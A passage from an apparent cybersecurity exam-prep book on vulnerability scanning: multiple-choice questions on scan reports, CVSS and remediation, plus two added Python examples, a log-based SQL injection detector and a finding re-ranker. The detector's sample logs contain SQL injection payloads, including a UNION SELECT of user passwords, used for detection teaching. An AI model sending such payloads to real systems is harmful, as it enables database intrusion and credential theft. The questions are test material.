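    return any(p.search(decoded) for p in SQLI_PATTERNS)


def find_sqli_attempts(lines):
    """Return (source host, timestamp, raw path, status) for every suspicious request."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and looks_like_sqli(rec["path"]):
            hits.append((rec["host"], rec["time"], rec["path"], rec["status"]))
    return hits


# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '10.0.5.20 - - [05/Apr/2017:03:41:12 -0400] "GET /products.php?id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.5.20 - - [05/Apr/2017:03:41:15 -0400] "GET /products.php?id=42%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [05/Apr/2017:03:42:01 -0400] "GET /products.php?id=42+UNION+SELECT+username,password+FROM+users-- HTTP/1.1" 500 312 "-" "sqlmap/1.1"',
    '203.0.113.9 - - [05/Apr/2017:03:42:30 -0400] "GET /search.php?q=summer+shoes HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    "this line is corrupt and will not parse",
]

if __name__ == "__main__":
    for host, when, path, status in find_sqli_attempts(SAMPLE_LOG):
        print(host, when, status, unquote_plus(path))
```

Two of the five constructed lines are flagged: the tautology probe from 10.0.5.20 (which the server answered with 200 and a much larger body than the normal request, a useful corroborating signal) and the UNION attempt from 203.0.113.9. In Carla's situation this is the check that distinguishes "the external scanner never sent the probe" from "the probe arrived and was blocked": the access log records only requests that reached Apache, so an in-line IPS dropping the injection requests leaves no entry at all.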

71. Ken is reviewing the results of a vulnerability scan, shown here, from a web server in his organization. Access to this server is restricted at the firewall so that it may not be accessed on port 80 or 443. Which of the following vulnerabilities should Ken still address? 


Vulnerabilities (6) 
5  EOL/Obsolete Software: OpenSSL 0.9.8/1.0.0 Detected 
3  Apache HTTP Server HttpOnly Cookie Information Disclosure Vulnerability 
3  HTTP TRACE / TRACK Methods Enabled 
2  Web Server HTTP Trace/Track Method Support Cross-Site Tracing Vulnerability 
1  Apache Web Server ETag Header Information Disclosure Weakness 
1  Presence of a Load-Balancing Device Detected 

A. OpenSSL version 
B. Cookie information disclosure 
C. TRACK/TRACE methods 
D. Ken does not need to address any of these vulnerabilities because they are not exposed to the outside world. 
72. Brian is considering the use of several different categories of vulnerability plug-ins. Of the types listed here, which is the most likely to result in false positive reports? 


A. Registry inspection 

B. Banner grabbing 

C. Service interrogation 

D. Fuzzing 

73. Rob conducts a vulnerability scan and finds three different vulnerabilities, with the CVSS scores shown here. Which vulnerability should be his highest priority to fix, assuming all three fixes are of equal difficulty?

Vulnerability 1
CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N

Vulnerability 2
CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability 3
CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N

A. Vulnerability 1
B. Vulnerability 2
C. Vulnerability 3
D. Vulnerabilities 1 and 3 are equal in priority.

74. Which one of the following is not an appropriate criterion to use when prioritizing the remediation of vulnerabilities?

A. Network exposure of the affected system 

B. Difficulty of remediation 

C. Severity of the vulnerability 

D. All of these are appropriate. 

75. Landon is preparing to run a vulnerability scan of a dedicated Apache server that his organization is planning to move into a DMZ. Which one of the following vulnerability scans is least likely to provide informative results?

A. Web application vulnerability scan
B. Database vulnerability scan
C. Port scan
D. Network vulnerability scan
76. Ken recently received the vulnerability report shown here that affects a file server used by his organization. What is the primary nature of the risk introduced by this vulnerability?

Severity 3: NetBIOS Name Conflict Vulnerability
First Detected: 02/04/2017 at 21:06:51 (GMT-0400) Last Detected: 04/04/2017 at 21:22:12 (GMT-0400)
QID: 70008 CVSS Base: 5 CVSS Temporal: 4.1
Category: SMB / NETBIOS
CVE ID: CVE-2000-0673
Vendor Reference: MS00-047
Bugtraq ID: 1514, 1515
Service Modified: 03/17/2009
Edited: No
PCI Vuln: Yes

THREAT:
A malicious user can send a NetBIOS Name Conflict message to the NetBIOS name service even when the receiving machine is not in the process of registering its NetBIOS name. As a result, the target will not attempt to use that name in any future network connection attempts, which could lead to intermittent connectivity problems, or the loss of all NetBIOS functionality.

This is a design flaw problem in the NetBIOS protocol and the WINS dynamic name registration, which is present whenever WINS is supported.

IMPACT:
If successfully exploited, this vulnerability could lead to intermittent connectivity problems, or the loss of all NetBIOS functionality.

SOLUTION:
The best workaround for Microsoft Windows and Samba Server is to block all incoming traffic from the Internet to UDP ports 137 and 138.

For Windows platforms, Microsoft has released some patches to address this issue.

Microsoft has released a patch (Hotfix 269239). After the patch is applied, conflict messages will only be responded to during the initial name registration process. For more information on this vulnerability and the patch, read Microsoft Security Bulletin (MS00-047).

Hotfix 269239 mitigates the issue by generating log events for detected name conflicts. Note that while Hotfix 269239 provides notification when name conflicts occur, the system remains vulnerable. Microsoft acknowledges this problem in their documentation for Hotfix 269239.

The following is a list of Microsoft patches:
Microsoft Windows NT 4.0 patch Q269239i
Microsoft Windows NT Terminal Server patch (link not legible in the scan)
Microsoft Windows 2000 SP2 patch Q269239 (link not legible in the scan)

For Samba there are no vendor supplied patches available at this time.

A. Confidentiality
B. Integrity
C. Availability
D. Nonrepudiation


77. Molly is assessing the criticality of a vulnerability discovered on her organization's network. It has the CVSS information shown here. What is the greatest risk exposed by this server?

Risk Information
Risk Factor: Medium
CVSS Base Score: 5.0
CVSS Vector: CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N


A. Confidentiality

B. Integrity 

C. Availability 

D. There is no risk associated with this vulnerability. 


78. Bill is creating a vulnerability management program for his company. He has limited scanning resources and would like to apply them to different systems based upon the sensitivity and criticality of the information that they handle. What criteria should Bill use to determine the vulnerability scanning frequency?

A. Data remanence
B. Data privacy
C. Data classification
D. Data privacy

79. Tom recently read a media report about a ransomware outbreak that was spreading rapidly across the Internet by exploiting a zero-day vulnerability in Microsoft Windows. As part of a comprehensive response, he would like to include a control that would allow his organization to effectively recover from a ransomware infection. Which one of the following controls would best achieve Tom's objective?


A. Security patching 

B. Host firewalls 

C. Backups 

D. Intrusion prevention systems 


80. Kaitlyn discovered the vulnerability shown here on a workstation in her organization. Which one of the following is not an acceptable method for remediating this vulnerability?

Severity 3: WinRAR Insecure Executable Loading Remote Code Execution Vulnerability
First Detected: 12/04/2016 at 19:06:20 (GMT-0400) Last Detected: 04/04/2017 at 20:54:02 (GMT-0400)
QID: 370233 CVSS Base: 3.7 CVSS Temporal: 3.1
Category: Local
CVE ID: CVE-2015-5663
Bugtraq ID: 79666
Service Modified: 11/28/2016
Edited: No
PCI Vuln: No

THREAT:
WinRAR is a shareware file archiver and compressor utility for Windows. It can create archives in RAR or ZIP file formats and unpack numerous archive file formats. The file-execution functionality in WinRAR allows local users to escalate privileges via a Trojan horse file with a name similar to an extensionless filename.

Affected Versions:
WinRAR prior to 5.30 Beta 5

A. Upgrade WinRAR.
B. Upgrade Windows.
C. Remove WinRAR.
D. Replace WinRAR with an alternate compression utility.


81. Brent ran a vulnerability scan of several network infrastructure devices on his network and obtained the result shown here. What is the extent of the impact that an attacker could have by exploiting this vulnerability directly?

Severity 3: Readable SNMP Information
First Detected: 07/16/2014 at 20:06:22 (GMT-0400) Last Detected: 04/05/2017 at 04:15:02 (GMT-0400)
QID: 78030 CVSS Base: 10 CVSS Temporal: 9
Category: SNMP
CVE ID: CVE-1999-0517, CVE-1999-0186, CVE-1999-0254, CVE-1999-0516, CVE-1999-0472, CVE-2001-0514, CVE-2002-0109
Bugtraq ID: 3797, 2896, 3795
Service Modified: 05/22/2012
Edited: No
PCI Vuln: Yes

THREAT:
Unauthorized users can read all SNMP information because the access password is not secure.

A. Denial of service
B. Theft of sensitive information
C. Network eavesdropping
D. Reconnaissance


82. Ted runs the cybersecurity vulnerability management program for his organization. He sends a database administrator a report of a missing database patch that corrects a high severity security issue. The DBA writes back to Ted that he has applied the patch. Ted reruns the scan, and it still reports the same vulnerability. What should Ted do next?


A. Mark the vulnerability as a false positive. 

B. Ask the DBA to recheck the database. 

C. Mark the vulnerability as an exception. 

D. Escalate the issue to the DBA’s manager. 

83. Miranda is reviewing the results of a vulnerability scan and identifies the issue shown here in one of her systems. She consults with developers who check the code and assure her that it is not vulnerable to SQL injection attacks. An independent auditor confirms this for Miranda. What is the most likely scenario?

CGI Generic SQL Injection (blind, time based)

Description
By sending specially crafted parameters to one or more CGI scripts hosted on the remote web server, Nessus was able to get a slower response, which suggests that it may have been able to modify the behavior of the application and directly access the underlying database.

An attacker may be able to exploit this issue to bypass authentication, read confidential data, modify the remote database, or even take control of the remote operating system.

Note that this script is experimental and may be prone to false positives.

Solution
Modify the affected CGI scripts so that they properly escape arguments.

A. This is a false positive report.
B. The developers are wrong, and the vulnerability exists.
C. The scanner is malfunctioning.
D. The database server is misconfigured.


84. Eric is reviewing the results of a vulnerability scan and comes across the vulnerability report shown here. Which one of the following services is least likely to be affected by this vulnerability?

Severity 2: X.509 Certificate MD5 Signature Collision Vulnerability
First Detected: 12/11/2013 at 22:38:17 (GMT-0400) Last Detected: 03/05/2017 at 03:35:56 (GMT-0400)
QID: 42012 CVSS Base: 5 CVSS Temporal: 4.3
Category: General remote services
CVE ID: CVE-2004-2761
Bugtraq ID: 33065
Service Modified: 09/17/2009
Edited: No
PCI Vuln: Yes

THREAT:
Hash algorithms are used to generate a hash value for a message (an arbitrary block of data) such that a number of cryptographic properties hold. In particular it is expected to be resistant to collisions, that is that given a message m, it is difficult to compute a second message m' such that both have the same hash value.

A. HTTPS
B. HTTP
C. SSH
D. VPN
Questions 85 and 86 refer to the following scenario:

Larry recently discovered a critical vulnerability in one of his organization's database servers during a routine vulnerability scan. When he showed the report to a database administrator, the administrator responded that they had corrected the vulnerability by using a vendor-supplied workaround because upgrading the database would disrupt an important process. Larry verified that the workaround is in place and corrects the vulnerability.

85. How should Larry respond to this situation? 
A. Mark the report as a false positive. 
B. Insist that the administrator apply the vendor patch. 
C. Mark the report as an exception. 
D. Require that the administrator submit a report describing the workaround after each vulnerability scan.

86. What is the most likely cause of this report? 
A. The vulnerability scanner requires an update. 
B. The vulnerability scanner depends upon version detection. 
C. The database administrator incorrectly applied the workaround. 
D. Larry misconfigured the scan. 


87. Breanne ran a vulnerability scan of a server in her organization and found the vulnerability shown here. What is the use of the service affected by this vulnerability?

POP3 Cleartext Logins Permitted
Plugin Details: ID: 15855, Version: $Revision: 1.20 $, Type: remote, Family: Misc., Published: 2004/11/30, Modified: 2015/06/23
Severity: Low

Description
The remote host is running a POP3 daemon that allows cleartext logins over unencrypted connections.

An attacker can uncover user names and passwords by sniffing traffic to the POP3 daemon if a less secure authentication mechanism (eg, USER command, AUTH PLAIN, AUTH LOGIN) is used.

Solution
Contact your vendor for a fix or encrypt traffic with SSL / TLS using stunnel.

See Also
http://tools.ietf.org/html/rfc2222
http://tools.ietf.org/html/rfc2595

Risk Information
Risk Factor: Low
CVSS Base Score: 2.6
CVSS Vector: CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N

Output
The following cleartext methods are supported :
USER
SASL PLAIN LOGIN

Port / Hosts
110 / tcp / pop3

A. Web server
B. Database server
C. Email server
D. Directory server


88. Margot discovered that a server in her organization has a SQL injection vulnerability. She would like to investigate whether attackers have attempted to exploit this vulnerability. Which one of the following data sources is least likely to provide helpful information?

A. Netflow logs
B. Web server logs
C. Database logs
D. IDS logs


89. Krista is reviewing a vulnerability scan report and comes across the vulnerability shown here. She comes from a Linux background and is not as familiar with Windows administration. She is not familiar with the runas command mentioned in this vulnerability. What is the closest Linux equivalent command?

Severity 3: Microsoft Windows "RunAs" Password Length Local Information Disclosure - Zero Day
First Detected: 08/04/2015 at 18:02:25 (GMT-0400) Last Detected: 04/05/2017 at 02:19:36 (GMT-0400)
QID: 116157 CVSS Temporal: 3.4 (CVSS Base not legible in the scan)
Category: Local
CVE ID: CVE-2009-0320
Bugtraq ID: 33440
Service Modified: 09/04/2009
Edited: No
PCI Vuln: Yes

THREAT:
RunAs is a service component for Windows, which can be used to execute a second application as a different user, generally for performing privileged operations.

RunAs is prone to a local password disclosure vulnerability that allows a malicious user to guess the password length when "runas.exe" is used to launch an application under another user's privilege. When the application prompts the current user for the password of the specified user, a local attacker can monitor the "I/O Other Bytes" performance of the application to determine the length of the submitted password.

A. sudo
B. grep
C. su
D. ps
90. After scanning a web application for possible vulnerabilities, Barry received the result shown here. Which one of the following best describes the threat posed by this vulnerability?

Vulnerabilities (1)
Severity 3: Web Server Uses Plain-Text Form Based Authentication
First Detected: 08/03/2014 at 12:02:19 (GMT-0400) Last Detected: 04/09/2017 at 20:31:35 (GMT-0400)
QID: 86728 CVSS Temporal: 3.6 (CVSS Base not legible in the scan)
Category: Web server
CVE ID: -
Bugtraq ID: -
Service Modified: 09/04/2016
Edited: No
PCI Vuln: Yes

A. An attacker can eavesdrop on authentication exchanges.
B. An attacker can cause a denial-of-service attack on the web application.
C. An attacker can disrupt the encryption mechanism used by this server.
D. An attacker can edit the application code running on this server.


91. Michelle would like to share information about vulnerabilities with partner organizations 
who use different vulnerability scanning products. What component of SCAP can best assist 
her in ensuring that the different organizations are talking about the same vulnerabilities? 


A. CPE 
B. CVE 
C. CVSS 
D. OVAL 


92. Javier ran a vulnerability scan of a network device used by his organization and discovered the vulnerability shown here. What type of attack would this vulnerability enable?

Severity 2: UDP Constant IP Identification Field Fingerprinting Vulnerability
First Detected: 03/17/2012 at 01:33:14 (GMT-0400) Last Detected: 04/05/2017 at 01:57:57 (GMT-0400)
QID: 82024
Category: TCP/IP
CVE ID: CVE-2002-0510
Bugtraq ID: 4314
Service Modified: 05/07/2008
Edited: No

THREAT:
The host transmits UDP packets with a constant IP Identification field. This behavior may be exploited to discover the operating system and approximate kernel version of the vulnerable system. Normally, the IP Identification field is intended to be a reasonably unique value, and is used to reconstruct fragmented packets. It has been reported that in some versions of the Linux kernel IP stack implementation as well as other operating systems, UDP packets are transmitted with a constant IP Identification field of 0.

A. Denial of service
B. Information theft
C. Information alteration
D. Reconnaissance
93. Amanda scans a Windows server in her organization and finds that it has multiple critical vulnerabilities, detailed in the report shown here. What action can Amanda take that will have the most significant impact on these issues without creating a long-term outage?

Host 172.19.x.x (address not legible in the scan): Windows Server 2008 R2 Enterprise 64 bit Edition Service Pack 1
Vulnerabilities (27), excerpt:
Severity 5: Microsoft Cumulative Security Update for Internet Explorer (MS17-006) - New
Severity 5: Microsoft Cumulative Security Update for Windows (MS17-012) - New
Severity 4: Uniscribe Multiple Remote Code Execution and Information Disclosure Vulnerabilities (MS17-…) - New
Severity 4: Microsoft Security Update for Windows Kernel-Mode Drivers (MS17-018) - New
Severity 4: Microsoft Windows DirectShow Information Disclosure Vulnerability (MS17-021) - New
Severity 4: Microsoft XML Core Services Information Disclosure Vulnerability (MS17-022) - New
Severity 4: Microsoft Windows Kernel Elevation of Privileges (MS17-017) - New
Severity 3: Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32), port 3389/tcp over SSL - New
Severity 5: Veritas NetBackup Remote Access Vulnerabilities (VTS16-001) - Active
Severity 5: EOL/Obsolete Software: Microsoft VC++ 2005 Detected - Active
Severity 5: Microsoft Foundation Class Library Remote Code Execution Vulnerability (MS11-025) - Active
Severity 4: Microsoft Windows Graphics Component Multiple Vulnerabilities (MS17-013) - Active
Severity 3: Microsoft Windows "RunAs" Password Length Local Information Disclosure - Zero Day - Active
Severity 3: Built-in Guest Account Not Renamed at Windows Target System - Active
Severity 3: Windows Unquoted/Trusted Service Paths Privilege Escalation Security Issue - Active
Severity 3: Microsoft .Net Framework RC4 in TLS Not Disabled (KB2960358) - Active

A. Configure the host firewall to block inbound connections.
B. Apply security patches.
C. Disable the guest account on the server.
D. Configure the server to only use secure ciphers.
94. Ben is preparing to conduct a vulnerability scan for a new client of his security consulting 
organization. Which one of the following steps should Ben perform first? 
A. Conduct penetration testing. 
B. Run a vulnerability evaluation scan.
C. Run a discovery scan.
D. Obtain permission for the scans. 
95. Katherine coordinates the remediation of security vulnerabilities in her organization and is attempting to work with a system engineer on the patching of a server to correct a moderate impact vulnerability. The engineer is refusing to patch the server because of the potential interruption to a critical business process that runs on the server. What would be the most reasonable course of action for Katherine to take?

A. Schedule the patching to occur during a regular maintenance cycle.
B. Exempt the server from patching because of the critical business impact.
C. Demand that the server be patched immediately to correct the vulnerability.
D. Inform the engineer that if he does not apply the patch within a week that Katherine will file a complaint with his manager.
96. During a recent vulnerability scan of workstations on her network, Andrea discovered the vulnerability shown here. Which one of the following actions is least likely to remediate this vulnerability?

Severity 4: Sun Java RunTime Environment GIF Images Buffer Overflow Vulnerability
First Detected: 08/04/2015 at 18:02:25 (GMT-0400) Last Detected: 04/05/2017 at 03:40:45 (GMT-0400)
QID: 115501 CVSS Base: 6.8 CVSS Temporal: 5.3
Category: Local
CVE ID: CVE-2007-0243
Vendor Reference: (not legible in the scan)
Bugtraq ID: 22085
Service Modified: 10/21/2009
Edited: No
PCI Vuln: Yes
Ticket State: Open

THREAT:
The Java Runtime Environment is an application that allows users to run Java applications.

The Java Runtime Environment is prone to a buffer overflow vulnerability because the application fails to bounds check user-supplied data before copying it into an insufficiently sized memory buffer. Specifically, the vulnerability exists when the application processes a GIF image from a Java applet.

IMPACT:
An attacker can exploit this issue to execute arbitrary code with the privileges of the victim.

SOLUTION:
This issue is addressed in the following releases (for Windows, Solaris, and Linux):
JDK and JRE 5.0 Update 10 or later
SDK and JRE 1.4.2_13 or later
SDK and JRE 1.3.1_19 or later

J2SE 5.0 is available for download at JDK Downloads.

J2SE 5.0 Update 10 for Solaris is available in the following patches:
J2SE 5.0: update 10 (as delivered in patch 118666-10)
J2SE 5.0: update 10 (as delivered in patch 118667-10 (64bit))
J2SE 5.0_x86: update 10 (as delivered in patch 118668-10)
J2SE 5.0_x86: update 10 (as delivered in patch 118669-10 (64bit))
J2SE 1.4.2 is available for download at J2SE 1.4.2.
J2SE 1.3.1 is available for download at J2SE 1.3.

Refer to Oracle ID 1000058.1 for additional information on the vulnerabilities and patch details.
Patch:
Following are links for downloading patches to fix the vulnerabilities:
Sun Alert ID 102760 (separate links for J2SE 5.0, 1.4.2 and 1.3.1; link text not legible in the scan)

A. Remove JRE from workstations.
B. Upgrade JRE to the most recent version.
C. Block inbound connections on port 80 using the host firewall.
D. Use a web content filtering system to scan for malicious traffic.


97. Grace ran a vulnerability scan and detected an urgent vulnerability in a public-facing web server. This vulnerability is easily exploitable and could result in the complete compromise of the server. Grace wants to follow best practices regarding change control while also mitigating this threat as quickly as possible. What would be Grace's best course of action?

A. Initiate a high-priority change through her organization's change management process and wait for the change to be approved.
B. Implement a fix immediately and document the change after the fact.
C. Schedule a change for the next quarterly patch cycle.
D. Initiate a standard change through her organization's change management process.


98. Doug is preparing an RFP for a vulnerability scanner for his organization. He needs to know the number of systems on his network to help determine the scanner requirements. Which one of the following would not be an easy way to obtain this information?

A. ARP tables
B. Asset management tool
C. Discovery scan
D. Results of scans recently run by a consultant


99. Mary runs a vulnerability scan of her entire organization and shares the report with another analyst on her team. An excerpt from that report appears here. Her colleague points out that the report contains only vulnerabilities with severities of 3, 4, or 5. What is the most likely cause of this result?


Scan report excerpt (five hosts; host addresses are not legible in the scan):

Host 1, Vulnerabilities (7):
Severity 3: Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32), port 443/tcp over SSL
Severity 3: SSL/TLS use of weak RC4 cipher, port 443/tcp over SSL
Severity 3: SSLv3 Padding Oracle Attack Information Disclosure Vulnerability (POODLE), port 443/tcp over SSL
Severity 3: SSLv3.0/TLSv1.0 Protocol Weak CBC Mode Server Side Vulnerability (BEAST), port 443/tcp over SSL
Severity 3: SSL/TLS Server supports TLSv1.0, port 443/tcp over SSL
Severity 3: SSL Server Has SSLv3 Enabled Vulnerability, port 443/tcp over SSL
Severity 3: HTTP TRACE / TRACK Methods Enabled, port 443/tcp

Host 2, Vulnerabilities (7): the same seven severity 3 findings as Host 1, all on port 443/tcp

Host 3, Vulnerabilities (1):
Severity 3: Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32), port 443/tcp over SSL

Host 4, Vulnerabilities (4):
Severity 3: Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32), port 3389/tcp over SSL
Severity 3: Windows Remote Desktop Protocol Weak Encryption Method Allowed, port 3389/tcp over SSL
Severity 3: SSL/TLS Server supports TLSv1.0, port 3389/tcp over SSL
Severity 3: SSL/TLS use of weak RC4 cipher, port 3389/tcp over SSL

Host 5, Vulnerabilities (3):
Severity 3: SSL/TLS use of weak RC4 cipher, port 443/tcp over SSL
Severity 3: SSLv3.0/TLSv1.0 Protocol Weak CBC Mode Server Side Vulnerability (BEAST), port 443/tcp over SSL
Severity 3: SSL/TLS Server supports TLSv1.0, port 443/tcp over SSL

Operating systems identified for the hosts: Ubuntu / Tiny Core Linux / Linux 2.6.x; Ubuntu / Fedora / Tiny Core Linux / Linux 3.x; Windows 2012 Standard. Finding statuses shown are Active, New and Fixed.
A. The scan sensitivity is set to exclude low-importance vulnerabilities.
B. Mary did not configure the scan properly.
C. Systems in the data center do not contain any level 1 or 2 vulnerabilities.
D. The scan sensitivity is set to exclude high-impact vulnerabilities.


100. James is reviewing the vulnerability shown here, which was detected on several servers in his environment. What action should James take?

TCP/IP Timestamps Supported
Plugin Details: ID: 25220, Version: 1.19, Type: remote, Family: General, Published: 2007/05/16, Modified: 2011/03/20
Severity: Info

Description
The remote host implements TCP timestamps, as defined by RFC1323. A side effect of this feature is that the uptime of the remote host can sometimes be computed.

See Also
http://www.ietf.org/rfc/rfc1323.txt

A. Block TCP/IP access to these servers from external sources.
B. Upgrade the operating system on these servers.
C. Encrypt all access to these servers.
D. No action is necessary.


101. Which one of the following approaches provides the most current and accurate information about vulnerabilities present on a system because of the misconfiguration of operating system settings?

A. On-demand vulnerability scanning
B. Continuous vulnerability scanning
C. Scheduled vulnerability scanning
D. Agent-based monitoring


Questions 102 through 104 refer to the following scenario:

Pete recently conducted a broad vulnerability scan of all the servers and workstations in his environment. He scanned the following three networks:

DMZ network that contains servers with public exposure
Workstation network that contains workstations that are allowed outbound access only
Internal server network that contains servers exposed only to internal systems

He detected the following vulnerabilities:


Vulnerability 1: A SQL injection vulnerability on a DMZ server that would grant access to a database server on the internal network (severity 5/5)
Vulnerability 2: A buffer overflow vulnerability on a domain controller on the internal server network (severity 3/5)
Vulnerability 3: A missing security patch on several hundred Windows workstations on the workstation network (severity 2/5)
Vulnerability 4: A denial-of-service vulnerability on a DMZ server that would allow an attacker to disrupt a public-facing website (severity 2/5)
Vulnerability 5: A denial-of-service vulnerability on an internal server that would allow an attacker to disrupt an internal website (severity 4/5)

Note that the severity ratings assigned to these vulnerabilities are directly from the vulnerability scanner and were not assigned by Pete.

102. Absent any other information, which one of the vulnerabilities in the report should Pete remediate first?

A. Vulnerability 1 

B. Vulnerability 2 

C. Vulnerability 3 

D. Vulnerability 4 


103. Pete is working with the desktop support manager to remediate vulnerability 3. What would be the most efficient way to correct this issue?


A. Personally visit each workstation to remediate the vulnerability. 

B. Remotely connect to each workstation to remediate the vulnerability. 

C. Perform registry updates using a remote configuration tool. 

D. Apply the patch using a GPO. 

104. Pete recently conferred with the organization's CISO, and the team is launching an initiative designed to combat the insider threat. They are particularly concerned about the theft of information by employees seeking to exceed their authorized access. Which one of the vulnerabilities in this report is of greatest concern given this priority?


A. Vulnerability 2 
B. Vulnerability 3 
C. Vulnerability 4 
D. Vulnerability 5 
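A worked example for questions 102 through 104, added here and not taken from the book: the scanner's 1-5 severity is all question 102 gives you, but questions 103 and 104 show that network zone, asset role and the threat model the organization is prioritizing change the order. The script below re-weights Pete's five findings once for an external-attacker model and once for an insider-theft model. Every weight, the `Finding` fields and the function names are illustrative assumptions of this example, not CVSS and not any vendor's scoring, and its output is not the book's answer key.

```python
"""Re-ranking scanner findings with context the scanner does not have.

Added example for questions 102-104; it is not the book's answer key and not
any vendor's scoring method. Every weight below is an illustrative assumption:
the point is that the scanner's 1-5 severity is re-weighted by network zone,
asset role and the threat model the organization is prioritizing, and that
the top of the list changes when the threat model changes.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    name: str
    scanner_severity: int   # 1-5, as reported by the scanner
    zone: str               # "dmz", "internal" or "workstation"
    asset: str              # role of the affected host
    impact: str             # "data_access", "code_exec" or "dos"


# Assumed zone weights. An external attacker reaches DMZ hosts first; an
# insider already stands on the internal and workstation networks.
ZONE_WEIGHT = {
    "external": {"dmz": 1.0, "internal": 0.5, "workstation": 0.4},
    "insider":  {"dmz": 0.6, "internal": 1.0, "workstation": 0.8},
}

# Assumed impact weights. A programme against insider data theft cares about
# findings that yield data or credentials and very little about availability.
IMPACT_WEIGHT = {
    "external": {"data_access": 1.0, "code_exec": 1.0, "dos": 0.7},
    "insider":  {"data_access": 1.0, "code_exec": 1.0, "dos": 0.2},
}

# Assumed asset multiplier: code execution on a domain controller exposes
# every credential in the domain, so it outranks an equal score elsewhere.
ASSET_WEIGHT = {"domain controller": 1.5}


def contextual_score(f: Finding, model: str) -> float:
    """scanner severity x zone exposure x impact relevance x asset criticality."""
    return round(
        f.scanner_severity
        * ZONE_WEIGHT[model][f.zone]
        * IMPACT_WEIGHT[model][f.impact]
        * ASSET_WEIGHT.get(f.asset, 1.0),
        2,
    )


def rank(findings, model: str):
    """Highest priority first; ties fall back to the raw scanner severity."""
    return sorted(
        findings,
        key=lambda f: (contextual_score(f, model), f.scanner_severity),
        reverse=True,
    )


# Pete's five findings, encoded from the scenario text.
PETE = [
    Finding("Vulnerability 1", 5, "dmz", "web server", "data_access"),
    Finding("Vulnerability 2", 3, "internal", "domain controller", "code_exec"),
    Finding("Vulnerability 3", 2, "workstation", "workstation fleet", "code_exec"),
    Finding("Vulnerability 4", 2, "dmz", "web server", "dos"),
    Finding("Vulnerability 5", 4, "internal", "intranet server", "dos"),
]


def first_to_fix(model: str) -> str:
    return rank(PETE, model)[0].name


if __name__ == "__main__":
    for model in ("external", "insider"):
        print(model, [(f.name, contextual_score(f, model)) for f in rank(PETE, model)])
```

Under the external model the raw scanner order survives (the DMZ SQL injection stays on top); under the insider weights the domain-controller overflow moves up and both denial-of-service findings sink, because an insider stealing data gains nothing from an outage. The weights are the part to argue about in your own environment; the structure (severity, times exposure, times impact relevance, times asset criticality) is what the re-ranking demonstrates.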
105. Wanda recently discovered the vulnerability shown here on a Windows server in her organization. She is unable to apply the patch to the server for six weeks because of operational issues. What workaround would be most effective in limiting the likelihood that this vulnerability would be exploited? 

[Scan result: severity 4] Microsoft Windows Graphics Component Multiple Vulnerabilities (MS17-013) 
First Detected: 03/04/2017 at 21:44:56 (GMT-0400)  Last Detected: 04/04/2017 at 21:57:33 (GMT-0400) 
QID: 91331  Category: Windows  Vendor Reference: MS17-013  Service Modified: 03/14/2017 
CVSS Base: 9.3  CVSS Temporal: 8.1  CVSS3 Base: 7.8  CVSS3 Temporal: 7.4 
CVE ID: CVE-2017-0001, CVE-2017-0005, CVE-2017-0014, CVE-2017-0025, CVE-2017-0038, CVE-2017-0047, CVE-2017-0060, CVE-2017-0061, CVE-2017-0062, CVE-2017-0063, CVE-2017-0073, CVE-2017-0108 
Bugtraq ID: 96057, 96033, 96013, 96626, 96023, 96034, 96713, 96637 
PCI Vuln: Yes  Ticket State: Open 
THREAT: This security update resolves vulnerabilities in Microsoft Windows, Microsoft Office, Skype for Business, Microsoft Lync, and Microsoft Silverlight. The security update addresses the vulnerabilities by correcting how the software handles objects in memory. This security update is rated Critical for all supported releases of Microsoft Windows, affected editions of Microsoft Office 2007 and Microsoft Office 2010, affected editions of Skype for Business 2016, Microsoft Lync 2013, and Microsoft Lync 2010, and affected editions of Silverlight. 
IMPACT: The most severe of these vulnerabilities could allow remote code execution if a user either visits a specially crafted website or opens a specially crafted document. 

A. Restrict interactive logins to the system. 
B. Remove Microsoft Office from the server. 
C. Remove Internet Explorer from the server. 
D. Apply the security patch. 

106. Garrett is configuring vulnerability scanning for a new web server that his organization is deploying on its DMZ network. The server hosts the company’s public website. What type of scanning should Garrett configure for best results? 

A. Garrett should not perform scanning of DMZ systems. 
B. Garrett should perform external scanning only. 
C. Garrett should perform internal scanning only. 
D. Garrett should perform both internal and external scanning. 
107. Frank recently ran a vulnerability scan and identified a POS terminal that contains an unpatchable vulnerability because it runs an unsupported operating system. Frank consults with his manager and is told that the POS is being used with full knowledge of management and, as a compensating control, it has been placed on an isolated network with no access to other systems. Frank’s manager tells him that the merchant bank is aware of the issue. How should Frank handle this situation? 

A. Document the vulnerability as an approved exception. 
B. Explain to his manager that PCI DSS does not permit the use of unsupported operating systems. 
C. Decommission the POS system immediately to avoid personal liability. 
D. Upgrade the operating system immediately. 

108. James is configuring vulnerability scans of a dedicated network that his organization uses for processing credit card transactions. What type of scan is least important for James to include in his scanning program? 

A. Scans from a dedicated scanner on the card processing network 
B. Scans from an external scanner on his organization’s network 
C. Scans from an external scanner operated by an approved scanning vendor 
D. All three types of scans are equally important. 

109. Helen performs a vulnerability scan of one of the internal LANs within her organization and finds a report of a web application vulnerability on a device. Upon investigation, she discovers that the device in question is a printer. What is the most likely scenario in this case? 

A. The printer is running a web server. 
B. The report is a false positive result. 
C. The printer recently changed IP addresses. 
D. Helen inadvertently scanned the wrong network. 

110. Joe discovered a critical vulnerability in his organization’s database server and received permission from his supervisor to implement an emergency change after the close of business. He has eight hours before the planned change window. In addition to planning the technical aspects of the change, what else should Joe do to prepare for the change? 

A. Ensure that all stakeholders are informed of the planned outage. 
B. Document the change in his organization’s change management system. 
C. Identify any potential risks associated with the change. 
D. All of the above 
